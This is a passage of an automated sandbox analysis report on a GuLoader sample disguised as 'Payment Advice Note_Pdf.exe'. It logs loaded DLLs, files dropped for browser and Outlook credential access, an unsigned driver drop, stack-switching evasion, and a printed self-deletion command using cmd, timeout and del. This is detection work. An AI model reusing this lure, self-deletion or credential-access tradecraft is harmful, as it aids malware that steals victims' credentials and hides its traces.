Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process created: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3	Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: crtdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: Payment Advice Note_Pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1427385273.00000000358A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Payment Advice Note_Pdf.exe, 00000002.00000002.1428231601.0000000036128000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.1305639727.00000000077F5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: api-ms-win-crt-stdio-l1-1-0.dll.2.dr

Static PE information: 0xE0D5091C [Wed Jul 13 01:51:24 2089 UTC]

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: msvcp140.dll.2.dr

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Code function: 0_2_10002DE0 push eax; ret

0_2_10002E0E

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

File created: C:\Users\user\toenailed\quoteworthy\Atoning\Skiftevis.sys

Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File created: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process created: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe"
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process created: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	API/Special instruction interceptor: Address: 7E6848C
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	API/Special instruction interceptor: Address: 46E848C

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
